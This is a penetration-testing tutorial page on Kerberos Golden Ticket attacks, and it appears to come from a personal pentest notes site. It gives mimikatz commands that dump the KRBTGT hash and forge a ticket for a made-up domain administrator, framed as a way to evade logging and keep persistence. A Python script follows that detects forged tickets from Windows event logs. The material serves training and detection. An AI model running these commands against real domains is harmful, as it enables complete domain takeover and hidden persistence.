# Golden Tickets

As explained, the most powerful account on the DC is the KRBTGT account: its key is used to create the TGTs that grant access to any service in the domain. All that is needed (easy to say) is to compromise the Domain Controller, or use another attack such as DCSync, to obtain the password hash of this account. With that hash we can use mimikatz to forge a ticket and inject it into our session for any service we want. This attack is also excellent for avoiding logs, since the forged tickets look like legitimate TGTs.

Let's see this attack in action. After all the enumeration and exploitation with your setup, you have managed to get a shell on the DC (Domain Controller) and obtained a user, and this user has Administrator access.

![](/files/-M2vLZ7OgwZRUSn7fhoA)

Here we continue with mimikatz and request the hashes for the KRBTGT user. We can see that there are old hashes as well as the most current one for the user.

```
privilege::debug

lsadump::lsa /inject /name:krbtgt
```

On the Kali terminal you will need to make this a one-liner so that the mimikatz binary exits properly.

```
mimikatz.exe "privilege::debug" "lsadump::lsa /inject /name:krbtgt" exit
```

![](/files/-M2vN_76vnMFtE3YRB3G)

Continuing with the attack, we now request a Golden Ticket and create a fake user. This user will have total access to the DC and other machines, so from here the fake user will have permission to list the folders of the Domain Controller. It makes little sense to do this once the DC and a high-level user have already been compromised, but it is a great opportunity to avoid detection, as these forged tickets are signed with the KRBTGT account's key and are therefore treated as legitimate tickets.

![](/files/-M2vSf_Uapxf3JkAYc6N)

One-liner:

```
mimikatz.exe "kerberos::golden /domain:dc1.dominioncyber.local /sid:S-1-5-21-4198639423-1025486511-2226459690 /rc4:a8bbd83cc1ded03f7db3b07d78e95036 /user:Youllnevercatchme /id:500 /ptt"
```

Let's confirm our assumptions.

![](/files/-M2vcGtlp7-Dnv-OwYwm)

We can list the DC directories, and the user was authenticated to it as well. The ticket is saved in the session, and with mimikatz I used the `misc::cmd` command to open a new cmd window with that session in memory. This is also a great way to privesc or to maintain persistence on a machine.

{% hint style="info" %}
It is recommended to have an RDP session, as the new cmd window will not be shown on the attacker machine.
{% endhint %}
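The notes say forged tickets avoid logs because they look legitimate, and on the wire that is true. From the defender's side they still leave a gap in the audit trail: a forged TGT is injected straight into the client's session, so the KDC never recorded a TGT request (Security event 4768) for it, yet service-ticket requests (event 4769) for that account start appearing; in the case above the account (`Youllnevercatchme`) does not even exist in the directory. The following Python script is an added example, not part of the original notes or of mimikatz. It correlates constructed 4768/4769 records and flags 4769 events with no preceding 4768 from the same account and client, or for an account missing from a constructed directory snapshot. The event dicts, the account list, the timestamp units and the (account, client_ip) correlation key are all assumptions for illustration.

```python
"""Flag service-ticket requests that have no matching TGT request.

Added example for the Golden Ticket notes; not the page's own code.
Security event 4768 = "A Kerberos authentication ticket (TGT) was requested",
4769 = "A Kerberos service ticket was requested". Both are real Windows
event IDs; the records below are constructed stand-ins for parsed events.
"""
from collections import defaultdict

# Constructed sample events (assumption: dicts standing in for parsed
# Security.evtx records collected from every DC). Timestamps are seconds.
# The only value borrowed from the notes is the forged account name.
SAMPLE_EVENTS = [
    {"event_id": 4768, "account": "alice", "client_ip": "10.0.0.21", "ts": 100},
    {"event_id": 4769, "account": "alice", "client_ip": "10.0.0.21",
     "service": "cifs/dc1", "ts": 105},
    {"event_id": 4768, "account": "bob", "client_ip": "10.0.0.22", "ts": 110},
    {"event_id": 4769, "account": "bob", "client_ip": "10.0.0.22",
     "service": "ldap/dc1", "ts": 112},
    # Forged ticket: TGS request for an account that never requested a TGT
    # and does not exist in the directory.
    {"event_id": 4769, "account": "Youllnevercatchme", "client_ip": "10.0.0.50",
     "service": "cifs/dc1", "ts": 120},
    # Real account, but no TGT request was ever seen from this client
    # (ticket injected on a host that never authenticated to the KDC).
    {"event_id": 4769, "account": "alice", "client_ip": "10.0.0.99",
     "service": "cifs/dc1", "ts": 130},
]

# Constructed directory snapshot (assumption): accounts that really exist.
KNOWN_ACCOUNTS = {"alice", "bob", "krbtgt", "Administrator"}

# Default domain policy: a TGT lives at most 10 hours (36000 s). A 4769 is
# only "explained" by a 4768 that falls inside that window before it.
TGT_MAX_LIFETIME = 36000


def find_suspicious_tgs(events, known_accounts, tgt_lifetime=TGT_MAX_LIFETIME):
    """Return [(reason, event), ...] for 4769 events that look forged.

    Events are processed in timestamp order so a 4768 is only credited to
    4769 events that come after it.
    """
    known_lower = {a.lower() for a in known_accounts}
    tgt_seen = defaultdict(list)  # (account, client_ip) -> [4768 timestamps]
    findings = []
    for ev in sorted(events, key=lambda e: e["ts"]):
        key = (ev["account"].lower(), ev["client_ip"])
        if ev["event_id"] == 4768:
            tgt_seen[key].append(ev["ts"])
            continue
        if ev["event_id"] != 4769:
            continue
        if key[0] not in known_lower:
            findings.append(("account not in directory", ev))
            continue
        window_start = ev["ts"] - tgt_lifetime
        if not any(window_start <= t <= ev["ts"] for t in tgt_seen[key]):
            findings.append(("TGS request without preceding TGT request", ev))
    return findings


if __name__ == "__main__":
    for reason, ev in find_suspicious_tgs(SAMPLE_EVENTS, KNOWN_ACCOUNTS):
        print(f"{reason}: {ev['account']} from {ev['client_ip']} "
              f"-> {ev['service']} at t={ev['ts']}")
```

Two caveats apply when running this against real data. 4768 and 4769 are logged on whichever DC handled the request, so the events from all DCs must be collected centrally before correlating, otherwise a legitimate user whose TGT came from one DC and whose service ticket came from another is falsely flagged. And the "no preceding TGT" rule only holds inside the TGT lifetime, which is why the window is bounded; a forged ticket with an inflated lifetime (mimikatz defaults to ten years) is still caught by this rule as long as no 4768 for that account and client exists in the retained logs.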
